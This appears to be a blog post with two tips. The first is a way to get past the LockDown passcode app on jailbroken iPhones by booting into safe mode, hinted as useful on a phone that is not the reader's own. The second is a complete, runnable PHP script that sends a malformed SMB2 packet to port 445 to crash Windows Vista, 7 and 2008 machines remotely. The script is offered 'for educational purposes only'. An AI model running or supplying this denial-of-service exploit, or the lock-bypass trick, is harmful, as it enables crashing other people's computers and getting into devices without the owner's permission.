————
One funny thing about programs like LockDown is that they all use mobilesubstrate to attach. and for programs like LockDown that is adding security for iphone that’s not too good!
as you may know mobilesubstrate attached files and some more services would not work in safe mode! they are all disabled!
so for LockDown password (in my test case it was version 6.2! almost the latest by now) you can just use SBSetting to boot up in safe mode and access everything that has been locked!
if you don’t have SBSetting installed and you have Cydia Locked I guess it is not your own iPhone so I just say there is a command you could use via SSH connection to reset springboard to safe mode. it’s maybe “Touch something” or something else!;) try and learn
Once more Microsoft has done something great.
smb2 exploit that some may know as Blue Screen Vista Exploit has not yet been patched and not will be soon.
No Emergency Patch For Latest Windows Exploit
The solution for smb2 patch as Microsoft has published is to turn off your file sharing or turn on your firewall.
so you may use this exploit, of course for educational purposes only, and maybe to inform Microsoft of how annoying this exploit could be.
So I’ve managed to find/make a php code to do so and using it on my Mac with the php command. This code could run on iPhone with some modifications.
you may save this file (e.g bsod.php) and run it like this:
php ./bsod.php [IP]
so the file would be as following:
<?
/*
* Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
* Author: Ricardo Almeida
* email: ricardojba[at]aeiou[DoT]pt
*
* Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
*
*/
if ($argc != 2) {die("Usage: lame-smb-bsod.php \n");}
$host = $argv[1];
$payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($mysock, $host, 445);
if ($result === false) echo "Connect failed.\nReason: ($result) " . socket_strerror(socket_last_error($mysock)) . "\n";
else echo "\nConnected to $host\n";
echo "Bye, Bye WindowzÉ\n";
socket_write($mysock, $payload, strlen($payload));
socket_close($mysock);
?>
Full Detailed article about Windows Smb2 Exploit: SMB2 Exploitation Guide for Housekeepers & Dummies !
If you want this exploit in other Programming Languages: http://lmgtfy.com/?q=smb2+exploit+code
